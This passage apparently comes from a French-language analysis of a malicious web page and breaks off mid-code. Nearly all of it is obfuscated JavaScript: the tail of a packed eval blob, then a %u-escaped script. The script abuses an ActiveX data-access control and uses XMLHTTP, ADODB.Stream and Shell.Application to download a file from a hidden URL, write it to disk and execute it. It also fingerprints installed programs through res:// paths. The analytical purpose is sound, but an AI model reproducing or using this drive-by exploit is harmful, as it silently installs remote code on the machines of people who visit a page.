c%6%n%k%u%z%2%f%f%1%2%Q%2%B%c%c%B%2%Q%2%f%W%9%9%H%0%0%a%1%h%0%1%9%l%0%6%9%8%p%a%0%0%p%0%a%1i%0%9%8%2%6%b%X%7%O%1%o%0%1%6%a%e%a%3%b%9%q%9%q%0%0%9%f%m%e%3%o%l%j%g%3%0%n%c%6%5%c%9%5%c%0%5%7%5%b%5%c%8%5%a%5%c%1%n%k%u%z%2%f%f%1%2%Q%2%B%c%c%B%2%Q%2%f%x%9%8%6%q%0%7%a%p%7%a%b%3%8%9%b%e%6%8%3%a%a%8%q%1%b%7%6%m%0%v%b%8%l%0%b%8%l%b%f%m%e%3%o%l%j%g%3%0%n%b%5%c%6%5%c%8%5%c%1%5%a%5%c%9%5%c%0%5%7%n%k%u%z%2%f%f%1%2%Q%2%B%n%7%1b%n%10%B%t%i%d%i%d%4%4%k%w%0%s%13%S%u%x%N%M%h%v%m%s%3%k%u%s%h%2%y%y%2%1h%T%1%i%d%4%4%E%i%d%4%4%4%F%e%3%j%1i%t%i%d%4%4%D%i%d%i%d%4%4%s%13%S%u%x%N%M%h%v%2%y%2%f%f%t%i%d%4%D%i%d%i%d%4%e%3%h%H%e%r%2%11%A%13%C%N%w%X%O%N%t%i%d%D%i%d%i%d%w%H%r%g%h%k%p%r%2%J%P%1t%P%O%M%1e%r%0%H%e%l%1%i%d%E%i%d%4%A%j%e%2%11%A%13%C%N%w%X%O%N%2%y%2%x%s%u%S%1o%1b%O%v%M%s%0%1%t%i%d%4%k%w%2%0%11%A%13%C%N%w%X%O%N%2%y%y%2%f%1n%f%1%2%e%3%h%H%e%r%t%i%d%i%d%4%h%e%P%i%d%4%E%i%d%4%4%A%j%e%2%o%17%1a%x%C%1c%16%G%15%2%y%2%r%3%J%2%K%g%h%k%A%3%17%W%F%I%3%g%h%0%f%q%7%r%7%o%9%0%A%1%9%0%8%J%1%a%m%8%8%8%7%12%a%r%7%a%b%8%j%0%1%o%b%6%0%6%q%0%0%6%6%s%7%p%9%8%h%7%9%b%2%8%b%7%1%1e%0%7%k%a%1%9%3%6%7%b%J%6%9%b%3%1%0%e%a%1%8%7%2%6%7%7%Y%9%9%1%0%p%9%9%r%0%h%b%8%e%8%b%p%7%b%l%1%9%9%7%8%m%0%8%10%1%9%a%f%m%e%3%o%l%j%g%3%0%n%c%8%5%c%0%5%b%5%7%5%c%1%5%c%9%5%c%6%5%a%n%k%u%z%2%f%f%1%1%t%i%d%4%D%i%d%i%d%4%g%j%h%g%s%0%3%1%i%d%4%E%i%d%4%4%k%w%2%0%o%17%1a%x%C%1c%16%G%15%2%6%y%2%f%1n%0%0%9%p%6%F%8%a%6%7%I%6%6%3%1%g%7%6%h%1%7%b%1r%1%6%f%m%e%3%o%l%j%g%3%0%n%c%8%5%c%9%5%c%6%5%b%5%a%5%c%1%5%c%0%5%7%n%k%u%z%2%f%f%1%1%2%e%3%h%H%e%r%t%i%d%4%D%i%d%i%d%4%o%17%1a%x%C%1c%16%G%15%m%12%r%j%o%q%s%p%h%C%j%h%s%2%y%2%H%e%l%t%i%d%i%d%4%h%e%P%i%d%4%E%i%d%4%4%o%17%1a%x%C%1c%16%G%15%m%Y%p%x%o%e%3%q%q%3%v%C%j%h%s%2%y%2%11%A%13%C%N%w%X%O%N%2%Q%2%B%19%c%c%B%2%Q%2%f%C%7%9%1%8%e%b%1%0%p%1%6%0%7%u%b%6%b%1%e%8%j%1%9%7%b%x%1%6%b%2%a%8%G%0%0%a%1%k%8%8%8%0%l%a%8%0%1%3%9%6%b%q%8%9%f%m%e%3%o%l%j%g%3%0%n%a%5%b%5%c%0%5%c%8%5%7%5%c%1%5%c%9%5%c%6%n%k%u%z%2%f%f%1%2%Q%2%B%c%c%B%2%Q%2%f%W%8%0%H%7%b%h%6%8%7%l%6%p%8%0%p%1%1i%7%1%8%2%a%8%7%a%X%1%1%O%7%b%o%7%1%7%e%7%8%8%3%7%q%6%b%9%6%q%a%1%f%m%e%3%o%l%j%g%3%0%n%c%8%5%a%5%c%1%5%7%5%c%9%5%b%5%c%0%5%c%6%n%k%u%z%2%f%f%1%2%Q%2%B%c%c%B%2%Q%2%f%J%0%0%6%j%0%a%F%b%6%1%m%8%a%9%a%0%3%b%a%O%a%8%3%0%1%f%m%e%3%o%l%j%g%3%0%n%a%5%c%1%5%c%9%5%c%0%5%c%8%5%7%5%c%6%5%b%n%k%u%z%2%f%f%1%t%i%d%4%4%o%17%1a%x%C%1c%16%G%15%m%C%e%k%r%h%12%r%j%o%q%s%p%h%0%1%t%i%d%4%D%i%d%i%d%4%g%j%h%g%s%0%3%1%E%D%t%i%d%i%d%4%A%j%e%2%s%R%12%H%11%p%11%V%2%y%2%q%3%h%1p%r%h%3%e%A%j%l%0%w%H%r%g%h%k%p%r%0%1%E%k%w%2%0%o%17%1a%x%C%1c%16%G%15%m%e%3%j%v%P%12%h%j%h%3%2%y%y%2%R%1%2%E%g%l%3%j%e%1p%r%h%3%e%A%j%l%0%s%R%12%H%11%p%11%V%1%t%J%k%r%v%p%J%m%l%p%g%j%h%k%p%r%2%y%2%f%l%9%0%a%a%v%6%j%b%8%o%6%1%19%9%b%n%8%b%n%9%1%0%9%f%m%e%3%o%l%j%g%3%0%n%7%5%c%8%5%c%0%5%c%6%5%b%5%c%1%5%c%9%5%a%n%k%u%z%2%f%f%1%t%D%D%z%2%S%L%L%L%1%t%i%d%D%i%d%i%d%J%P%1t%P%O%M%1e%r%0%f%s%8%0%7%h%8%b%6%h%6%6%6%o%1%19%9%7%0%n%7%0%n%a%F%a%a%b%3%b%7%8%b%q%8%9%h%a%8%9%l%a%k%8%h%6%3%b%9%a%8%v%7%8%k%6%1%6%b%q%b%9%g%6%8%9%p%6%6%7%A%8%0%3%8%7%0%e%0%7%9%m%b%9%6%g%6%9%9%r%9%9%6%6%19%a%0%0%U%7%a%8%L%0%0%U%1%L%0%7%n%7%0%7%l%7%6%0%6%p%9%0%6%j%a%a%v%8%m%a%6%o%1%8%7%6%6%s%9%7%o%1%0%6%1s%6%a%k%b%v%7%0%6%y%7%10%b%f%m%e%3%o%l%j%g%3%0%n%c%6%5%c%1%5%a%5%c%9%5%7%5%b%5%c%8%5%c%0%n%k%u%z%2%f%f%1%1%t%d%w%H%r%g%h%k%p%r%2%1a%10%x%P%T%s%x%I%0%1%E%d%4%C%1d%G%2%y%2%r%3%J%2%K%e%e%j%P%0%B%K%g%e%p%C%1d%G%m%C%1d%G%B%z%2%B%C%1d%G%m%C%v%w%Y%h%e%l%B%1%t%d%4%w%p%e%0%k%2%k%r%2%C%1d%G%1%d%4%E%d%4%4%h%e%P%d%4%4%E%d%4%4%4%p%F%I%2%y%2%r%3%J%2%K%g%h%k%A%3%17%W%F%I%3%g%h%0%C%1d%G%1n%k%1r%1%t%d%4%4%4%k%w%2%0%p%F%I%1%d%4%4%4%E%d%4%4%4%4%v%p%g%H%x%3%r%h%m%J%e%k%h%3%0%f%1g%k%w%e%j%x%3%2%q%e%g%y%B%g%j%g%s%3%n%e%3%j%v%x%3%m%o%v%w%B%1k%1g%n%k%w%e%j%x%3%1k%f%1%t%d%4%4%4%D%d%4%4%D%d%4%4%g%j%h%g%s%0%3%1%E%D%d%4%D%d%4%h%e%P%d%4%E%d%4%4%p%F%I%2%y%2%r%3%J%2%K%g%h%k%A%3%17%W%F%I%3%g%h%0%B%12%s%p%g%1i%J%j%A%3%G%l%j%q%s%m%12%s%p%g%1i%J%j%A%3%G%l%j%q%s%B%1%t%d%4%4%k%w%2%0%p%F%I%1%d%4%4%E%d%4%4%4%v%p%g%H%x%3%r%h%m%J%e%k%h%3%0%f%1g%k%w%e%j%x%3%2%q%e%g%y%B%g%j%g%s%3%n%w%l%j%q%s%m%q%J%w%B%1k%1g%n%k%w%e%j%x%3%1k%f%1%t%d%4%4%D%d%4%D%d%4%g%j%h%g%s%0%3%1%E%D%d%D%d%1a%10%x%P%T%s%x%I%0%1%t\'));',62,94,'u0028|u0029|u0020|u0065|u0009|u007c|u0021|u0023|u005e|u0024|u0026|u0040|u005c|u000a|u0072|u0027|u0063|u0074|u000d|u0061|u0069|u006c|u002e|u002f|u0070|u006f|u0073|u006e|u0068|u003b|u0067|u0064|u0066|u006d|u003d|u002c|u0076|u0022|u0050|u007d|u007b|u0062|u0046|u0075|u006a|u0077|u0041|u0030|u004d|u0071|u0078|u0079|u002b|u0034|u0033|u0039|u0038|u0047|u004f|u0045|u0043|u004a|u0031|u007a|u0053|u0051|u0037|u0059|u0054|u0058|u0036|u003a|u004c|u0032|u005a|u0044|u0056|u0052|u003c|u0035|u006b|u004e|u003e|u002d|u0057|u005b|u0048|u0049|u0042|u005d|u003f|u0055|eval|unescape'.split('|'),0,{}))

</script>

</body>

</html>

On lance notre page web et la on obtient ceci :

eval(unescape('%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u0068%u004f%u0059%u0070%u005a%u0033%u0039%u006c%u0067%u0077%u0028%u0029%u000d%u000a%u007b%u000d%u000a%u0009%u0076%u0061%u0072%u0020%u0063%u0072%u0041%u006c%u004d%u0047%u0039%u0030%u0037%u0020%u003d%u0020%u0064%u006f%u0063%u0075%u006d%u0065%u006e%u0074%u002e%u0063%u0072%u0065%u0061%u0074%u0065%u0045%u006c%u0065%u006d%u0065%u006e%u0074%u0028%u0027%u006f%u0024%u0040%u0062%u0026%u0028%u0026%u006a%u0026%u0021%u0029%u005e%u0065%u0021%u0063%u0029%u0023%u005e%u0074%u0029%u0029%u005e%u0023%u0021%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u005e%u007c%u005c%u0021%u007c%u0026%u007c%u005c%u0024%u007c%u005c%u0029%u007c%u0040%u007c%u005c%u0028%u007c%u0023%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0029%u003b%u000d%u000a%u0009%u0063%u0072%u0041%u006c%u004d%u0047%u0039%u0030%u0037%u002e%u0073%u0065%u0074%u0041%u0074%u0074%u0072%u0069%u0062%u0075%u0074%u0065%u0028%u0027%u0069%u0024%u0026%u0029%u0064%u0024%u0040%u0026%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0028%u007c%u0023%u007c%u0026%u007c%u005c%u005e%u007c%u005c%u0024%u007c%u005c%u0029%u007c%u0040%u007c%u005c%u0021%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u002c%u0063%u0072%u0041%u006c%u004d%u0047%u0039%u0030%u0037%u0029%u003b%u000d%u000a%u0009%u0063%u0072%u0041%u006c%u004d%u0047%u0039%u0030%u0037%u002e%u0073%u0065%u0074%u0041%u0074%u0074%u0072%u0069%u0062%u0075%u0074%u0065%u0028%u0027%u0063%u0028%u0040%u0021%u006c%u0040%u005e%u0061%u0029%u005e%u0024%u0073%u0024%u0040%u0023%u0024%u0024%u0073%u0028%u0026%u005e%u0069%u0021%u0023%u0026%u0064%u0040%u005e%u005e%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0028%u007c%u0023%u007c%u005c%u0029%u007c%u005c%u0021%u007c%u005c%u0024%u007c%u0040%u007c%u005c%u005e%u007c%u0026%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u002c%u0027%u0063%u0029%u0023%u006c%u005e%u0028%u0073%u0026%u005e%u0040%u0028%u0069%u0040%u0023%u0064%u0029%u0021%u0028%u003a%u0021%u0029%u0042%u0024%u0028%u0029%u0044%u005e%u0023%u0039%u0021%u0026%u0036%u0040%u0040%u0028%u005e%u0043%u0029%u0035%u0024%u0035%u0028%u0040%u0036%u0023%u0024%u002d%u0021%u0040%u0036%u005e%u0035%u0024%u0028%u0041%u0026%u0028%u0029%u0033%u0028%u005e%u002d%u005e%u0040%u0023%u0031%u0026%u0024%u0031%u0024%u0044%u0023%u0023%u0030%u0040%u0024%u0023%u002d%u0023%u0029%u0039%u0021%u0038%u0040%u0033%u0040%u0024%u0026%u0041%u0023%u0029%u002d%u0029%u0026%u0030%u0021%u005e%u0030%u0024%u0040%u0043%u0026%u0030%u0023%u0023%u0023%u0034%u0028%u0046%u0021%u0040%u0043%u0026%u0026%u0021%u0032%u0024%u0039%u0040%u0028%u0045%u0028%u0023%u0033%u0023%u0029%u0026%u0036%u0021%u0026%u0028%u0028%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0021%u007c%u005c%u0024%u007c%u0040%u007c%u005c%u005e%u007c%u005c%u0028%u007c%u005c%u0029%u007c%u0026%u007c%u0023%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0029%u003b%u000d%u000a%u000d%u000a%u0009%u0074%u0072%u0079%u000d%u000a%u0009%u007b%u000d%u000a%u0009%u0009%u0076%u0061%u0072%u0020%u0070%u0067%u0031%u0066%u0038%u0076%u0064%u0033%u0067%u0061%u0020%u003d%u0020%u0063%u0072%u0041%u006c%u004d%u0047%u0039%u0030%u0037%u002e%u0043%u0072%u0065%u0061%u0074%u0065%u004f%u0062%u006a%u0065%u0063%u0074%u0028%u0027%u006d%u0040%u0073%u0040%u0078%u0021%u0021%u006d%u0023%u0024%u006c%u0028%u0032%u0023%u0026%u005e%u002e%u0021%u0021%u0024%u0058%u0040%u0021%u004d%u0028%u004c%u0040%u0048%u0023%u0040%u0023%u0054%u0024%u0023%u0024%u0054%u0023%u0021%u0050%u0026%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0026%u007c%u005c%u0028%u007c%u0023%u007c%u005c%u0024%u007c%u0040%u007c%u005c%u0021%u007c%u005c%u005e%u007c%u005c%u0029%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u002c%u0027%u0027%u0029%u003b%u000d%u000a%u0009%u0009%u0076%u0061%u0072%u0020%u0073%u0037%u0075%u004a%u0077%u0041%u0057%u0037%u004d%u0059%u0020%u003d%u0020%u0063%u0072%u0041%u006c%u004d%u0047%u0039%u0030%u0037%u002e%u0043%u0072%u0065%u0061%u0074%u0065%u004f%u0062%u006a%u0065%u0063%u0074%u0028%u0027%u0053%u005e%u0021%u0021%u0068%u0026%u0028%u0023%u0040%u0065%u0024%u0021%u0021%u006c%u005e%u005e%u0028%u0026%u006c%u0040%u0029%u002e%u005e%u0041%u0026%u0070%u0026%u0024%u0070%u0040%u0028%u0028%u005e%u006c%u0029%u0026%u005e%u0069%u0021%u0024%u0063%u0023%u0023%u0024%u0061%u0040%u0021%u0074%u005e%u0023%u0069%u0024%u0029%u0029%u006f%u0023%u006e%u0026%u0026%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0040%u007c%u005c%u0021%u007c%u0023%u007c%u005c%u0029%u007c%u005c%u0028%u007c%u005c%u0024%u007c%u005c%u005e%u007c%u0026%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u002c%u0027%u0027%u0029%u003b%u000d%u000a%u0009%u0009%u0076%u0061%u0072%u0020%u0063%u006c%u004a%u0069%u0052%u0069%u0038%u0034%u0020%u003d%u0020%u0063%u0072%u0041%u006c%u004d%u0047%u0039%u0030%u0037%u002e%u0043%u0072%u0065%u0061%u0074%u0065%u004f%u0062%u006a%u0065%u0063%u0074%u0028%u0027%u0061%u0029%u005e%u0064%u0023%u0021%u0040%u006f%u005e%u0023%u0064%u0023%u0040%u0021%u0023%u0062%u0028%u0026%u0026%u002e%u0026%u005e%u0028%u0021%u0026%u0073%u005e%u0024%u0074%u0024%u0024%u0023%u0072%u0021%u0023%u0065%u0021%u0023%u005e%u0029%u0061%u0028%u0028%u0028%u006d%u0029%u0021%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0026%u007c%u0023%u007c%u0040%u007c%u005c%u0029%u007c%u005c%u005e%u007c%u005c%u0024%u007c%u005c%u0028%u007c%u005c%u0021%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u002c%u0027%u0027%u0029%u003b%u000d%u000a%u000d%u000a%u0009%u0009%u0074%u0072%u0079%u000d%u000a%u0009%u0009%u007b%u000d%u000a%u0009%u0009%u0009%u0063%u006c%u004a%u0069%u0052%u0069%u0038%u0034%u002e%u0074%u0079%u0070%u0065%u0020%u003d%u0020%u0031%u003b%u000d%u000a%u0009%u0009%u0009%u0070%u0067%u0031%u0066%u0038%u0076%u0064%u0033%u0067%u0061%u002e%u006f%u0070%u0065%u006e%u0028%u0027%u0047%u0029%u0021%u0024%u0045%u0029%u0023%u0054%u0026%u0023%u0040%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0023%u007c%u005c%u0021%u007c%u005c%u0029%u007c%u0026%u007c%u005c%u0028%u007c%u005c%u005e%u007c%u005c%u0024%u007c%u0040%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u002c%u0027%u0068%u0040%u0023%u0028%u0074%u0029%u0029%u0028%u0074%u0023%u0023%u0029%u0040%u0070%u0028%u0024%u003a%u0021%u0028%u002f%u0029%u002f%u005e%u0062%u0024%u0021%u0065%u005e%u0024%u0073%u0024%u0040%u0074%u0026%u006c%u0026%u0024%u0069%u0026%u0029%u0040%u0021%u0074%u0040%u0021%u0026%u0065%u0029%u0023%u0064%u0021%u0023%u0021%u0023%u0069%u0029%u0029%u0029%u0073%u0028%u0024%u0028%u0040%u0063%u005e%u006f%u0026%u0026%u0076%u0024%u005e%u0021%u0065%u0026%u0021%u0028%u0072%u0028%u005e%u0040%u002e%u005e%u0024%u0021%u0063%u0023%u0029%u006e%u005e%u0024%u0028%u0023%u003a%u0021%u0029%u005e%u0038%u005e%u0021%u0028%u0040%u0030%u0024%u005e%u0023%u0029%u0028%u0038%u005e%u0030%u005e%u0040%u002f%u0024%u006c%u0021%u0026%u006f%u005e%u0061%u0024%u0064%u0023%u002e%u0029%u0021%u0070%u0040%u0021%u0024%u0068%u0023%u0028%u0029%u0028%u0070%u0024%u0040%u003f%u0021%u005e%u0069%u0024%u0040%u0026%u0028%u0040%u0064%u0026%u005e%u0023%u003d%u0021%u0030%u0029%u0040%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u005e%u007c%u005c%u0024%u007c%u005c%u0028%u007c%u005c%u0029%u007c%u005c%u0021%u007c%u0040%u007c%u0026%u007c%u0023%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u002c%u0066%u0061%u006c%u0073%u0065%u0029%u003b%u000d%u000a%u0009%u0009%u0009%u0070%u0067%u0031%u0066%u0038%u0076%u0064%u0033%u0067%u0061%u002e%u0073%u0065%u006e%u0064%u0028%u0029%u003b%u000d%u000a%u0009%u0009%u0009%u0063%u006c%u004a%u0069%u0052%u0069%u0038%u0034%u002e%u006f%u0070%u0065%u006e%u0028%u0029%u003b%u000d%u000a%u0009%u0009%u0009%u0063%u006c%u004a%u0069%u0052%u0069%u0038%u0034%u002e%u0057%u0072%u0069%u0074%u0065%u0028%u0070%u0067%u0031%u0066%u0038%u0076%u0064%u0033%u0067%u0061%u002e%u0072%u0065%u0073%u0070%u006f%u006e%u0073%u0065%u0042%u006f%u0064%u0079%u0029%u003b%u000d%u000a%u0009%u0009%u0009%u0076%u0061%u0072%u0020%u006a%u0036%u004f%u0070%u0047%u0034%u0056%u0034%u0020%u003d%u0020%u0027%u002e%u0023%u005e%u005e%u0024%u0024%u002f%u0021%u0026%u002f%u0021%u0026%u0026%u0026%u002e%u0024%u0040%u0026%u0028%u002e%u0029%u005e%u0040%u0024%u002f%u0023%u002f%u0021%u0023%u0026%u0066%u0023%u0026%u0040%u0069%u0029%u0026%u005e%u006c%u0026%u0028%u0029%u0065%u0024%u0040%u0026%u0040%u002e%u0021%u0065%u0028%u0026%u0078%u0040%u005e%u0065%u0023%u005e%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0021%u007c%u005c%u005e%u007c%u005c%u0028%u007c%u0026%u007c%u0023%u007c%u0040%u007c%u005c%u0029%u007c%u005c%u0024%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u003b%u000d%u000a%u0009%u0009%u0009%u0063%u006c%u004a%u0069%u0052%u0069%u0038%u0034%u002e%u0053%u0061%u0076%u0065%u0054%u006f%u0046%u0069%u006c%u0065%u0028%u006a%u0036%u004f%u0070%u0047%u0034%u0056%u0034%u002c%u0032%u0029%u003b%u000d%u000a%u0009%u0009%u0009%u0063%u006c%u004a%u0069%u0052%u0069%u0038%u0034%u002e%u0043%u006c%u006f%u0073%u0065%u0028%u0029%u003b%u000d%u000a%u0009%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0009%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u0020%u007b%u007d%u000d%u000a%u000d%u000a%u0009%u0009%u0074%u0072%u0079%u000d%u000a%u0009%u0009%u007b%u000d%u000a%u0009%u0009%u0009%u0073%u0037%u0075%u004a%u0077%u0041%u0057%u0037%u004d%u0059%u002e%u0073%u0068%u0065%u006c%u006c%u0065%u0078%u0065%u0063%u0075%u0074%u0065%u0028%u006a%u0036%u004f%u0070%u0047%u0034%u0056%u0034%u0029%u003b%u000d%u000a%u0009%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u0020%u007b%u007d%u007d%u000d%u000a%u0009%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u0020%u007b%u007d%u007d%u000d%u000a%u000d%u000a%u0068%u004f%u0059%u0070%u005a%u0033%u0039%u006c%u0067%u0077%u0028%u0029%u003b%u000d%u000a%u000d%u000a%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u006d%u0068%u0067%u0033%u0048%u0032%u0078%u0064%u004d%u0068%u0028%u0029%u000d%u000a%u007b%u000d%u000a%u0009%u0066%u006f%u0072%u0028%u0062%u0073%u006c%u006a%u0046%u004e%u0073%u006f%u004a%u0020%u003d%u0020%u0032%u002c%u0020%u007a%u0076%u0051%u0050%u0071%u0066%u0045%u0078%u0071%u0020%u003d%u0020%u0022%u0022%u003b%u0020%u0062%u0073%u006c%u006a%u0046%u004e%u0073%u006f%u004a%u0020%u003c%u003d%u0020%u0032%u0036%u003b%u0020%u0062%u0073%u006c%u006a%u0046%u004e%u0073%u006f%u004a%u002b%u002b%u0029%u000d%u000a%u0009%u007b%u000d%u000a%u0009%u0009%u007a%u0076%u0051%u0050%u0071%u0066%u0045%u0078%u0071%u0020%u003d%u0020%u0053%u0074%u0072%u0069%u006e%u0067%u002e%u0066%u0072%u006f%u006d%u0043%u0068%u0061%u0072%u0043%u006f%u0064%u0065%u0028%u0036%u0035%u0020%u002b%u0020%u0062%u0073%u006c%u006a%u0046%u004e%u0073%u006f%u004a%u0029%u003b%u000d%u000a%u0009%u0009%u0076%u0061%u0072%u0020%u0068%u0051%u0033%u0067%u006d%u0071%u004d%u0074%u0064%u0020%u003d%u0020%u006e%u0065%u0077%u0020%u0049%u006d%u0061%u0067%u0065%u0028%u0029%u003b%u000d%u000a%u0009%u0009%u0068%u0051%u0033%u0067%u006d%u0071%u004d%u0074%u0064%u002e%u0073%u0072%u0063%u0020%u003d%u0020%u0022%u0072%u0065%u0073%u003a%u002f%u002f%u0022%u0020%u002b%u0020%u007a%u0076%u0051%u0050%u0071%u0066%u0045%u0078%u0071%u0020%u002b%u0020%u0022%u003a%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u0050%u0029%u0021%u0072%u0040%u006f%u0028%u0028%u005e%u0024%u0028%u0067%u0029%u0072%u0021%u0061%u0023%u006d%u0026%u0021%u0040%u0021%u0020%u0029%u005e%u0029%u005e%u0046%u0029%u0021%u0029%u0069%u0026%u006c%u005e%u0021%u0065%u0026%u0026%u0023%u0073%u0024%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0040%u007c%u005c%u0024%u007c%u005c%u0028%u007c%u0026%u007c%u005c%u005e%u007c%u0023%u007c%u005c%u0029%u007c%u005c%u0021%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u004f%u0024%u0024%u0075%u0028%u0028%u0026%u0029%u0074%u0028%u0029%u0024%u006c%u0028%u0021%u0024%u005e%u006f%u0026%u0028%u0028%u006f%u0028%u0026%u006b%u0028%u0024%u005e%u0020%u0021%u0040%u0045%u0023%u0078%u0029%u0070%u0028%u0029%u0021%u0026%u0072%u0026%u0065%u0040%u0024%u0073%u0024%u0073%u0028%u0028%u0024%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0021%u007c%u005c%u0024%u007c%u005c%u0028%u007c%u0023%u007c%u0040%u007c%u005c%u005e%u007c%u0026%u007c%u005c%u0029%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u006d%u0024%u005e%u0021%u0073%u0028%u0023%u0026%u006f%u0023%u0026%u0040%u0065%u005e%u0024%u0040%u0072%u0021%u005e%u0065%u0026%u0026%u005e%u0073%u0029%u0040%u0023%u0021%u002e%u0028%u0064%u0040%u005e%u006c%u0028%u0040%u005e%u006c%u0040%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0040%u007c%u005c%u0021%u007c%u005c%u005e%u007c%u005c%u0029%u007c%u0026%u007c%u005c%u0024%u007c%u005c%u0028%u007c%u0023%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u002f%u0023%u0032%u002f%u0031%u0022%u003b%u000d%u000a%u000d%u000a%u0009%u0009%u0069%u0066%u0028%u0068%u0051%u0033%u0067%u006d%u0071%u004d%u0074%u0064%u002e%u0068%u0065%u0069%u0067%u0068%u0074%u0020%u003d%u003d%u0020%u0035%u0039%u0029%u000d%u000a%u0009%u0009%u007b%u000d%u000a%u0009%u0009%u0009%u0062%u0072%u0065%u0061%u006b%u003b%u000d%u000a%u0009%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0009%u0068%u0051%u0033%u0067%u006d%u0071%u004d%u0074%u0064%u0020%u003d%u0020%u0027%u0027%u003b%u000d%u000a%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0072%u0065%u0074%u0075%u0072%u006e%u0020%u007a%u0076%u0051%u0050%u0071%u0066%u0045%u0078%u0071%u003b%u000d%u000a%u007d%u000d%u000a%u000d%u000a%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u0077%u0079%u0055%u0079%u0078%u004d%u0056%u006e%u0028%u0075%u0072%u006c%u0029%u000d%u000a%u007b%u000d%u000a%u0009%u0076%u0061%u0072%u0020%u007a%u0076%u0051%u0050%u0071%u0066%u0045%u0078%u0071%u0020%u003d%u0020%u006d%u0068%u0067%u0033%u0048%u0032%u0078%u0064%u004d%u0068%u0028%u0029%u003b%u000d%u000a%u0009%u0069%u0066%u0020%u0028%u007a%u0076%u0051%u0050%u0071%u0066%u0045%u0078%u0071%u0020%u003d%u003d%u0020%u0027%u005b%u0027%u0029%u0020%u0072%u0065%u0074%u0075%u0072%u006e%u003b%u000d%u000a%u000d%u000a%u0009%u0074%u0072%u0079%u000d%u000a%u0009%u007b%u000d%u000a%u0009%u0009%u0076%u0061%u0072%u0020%u0070%u0058%u004c%u006d%u0050%u005a%u0054%u0046%u0059%u0020%u003d%u0020%u006e%u0065%u0077%u0020%u0041%u0063%u0074%u0069%u0076%u0065%u0058%u004f%u0062%u006a%u0065%u0063%u0074%u0028%u0027%u0073%u0023%u006e%u0023%u0070%u0024%u0028%u0076%u0029%u0024%u0028%u005e%u0077%u0029%u0026%u002e%u005e%u005e%u005e%u0023%u0053%u0026%u006e%u0023%u0026%u0040%u005e%u0061%u0028%u0029%u0070%u0040%u0021%u0028%u0021%u0073%u0028%u0028%u0021%u0021%u0068%u0023%u006f%u0024%u005e%u0074%u0023%u0024%u0040%u0020%u005e%u0040%u0023%u0029%u0056%u0028%u0023%u0069%u0026%u0029%u0024%u0065%u0021%u0023%u0040%u0077%u0021%u0024%u0040%u0065%u0029%u0028%u0072%u0026%u0029%u005e%u0023%u0020%u0021%u0023%u0023%u0043%u0024%u0024%u0029%u0028%u006f%u0024%u0024%u006e%u0028%u0074%u0040%u005e%u0072%u005e%u0040%u006f%u0023%u0040%u006c%u0029%u0024%u0024%u0023%u005e%u002e%u0028%u005e%u0031%u0029%u0024%u0026%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u005e%u007c%u005c%u0028%u007c%u0040%u007c%u0023%u007c%u005c%u0029%u007c%u005c%u0024%u007c%u005c%u0021%u007c%u0026%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0029%u003b%u000d%u000a%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u000d%u000a%u0009%u007b%u000d%u000a%u0009%u0009%u0069%u0066%u0020%u0028%u0070%u0058%u004c%u006d%u0050%u005a%u0054%u0046%u0059%u0020%u0021%u003d%u0020%u0027%u005b%u0028%u0028%u0024%u006f%u0021%u0062%u005e%u0026%u0021%u0023%u006a%u0021%u0021%u0065%u0029%u0063%u0023%u0021%u0074%u0029%u0023%u0040%u005d%u0029%u0021%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u005e%u007c%u005c%u0024%u007c%u005c%u0021%u007c%u0040%u007c%u0026%u007c%u005c%u0029%u007c%u005c%u0028%u007c%u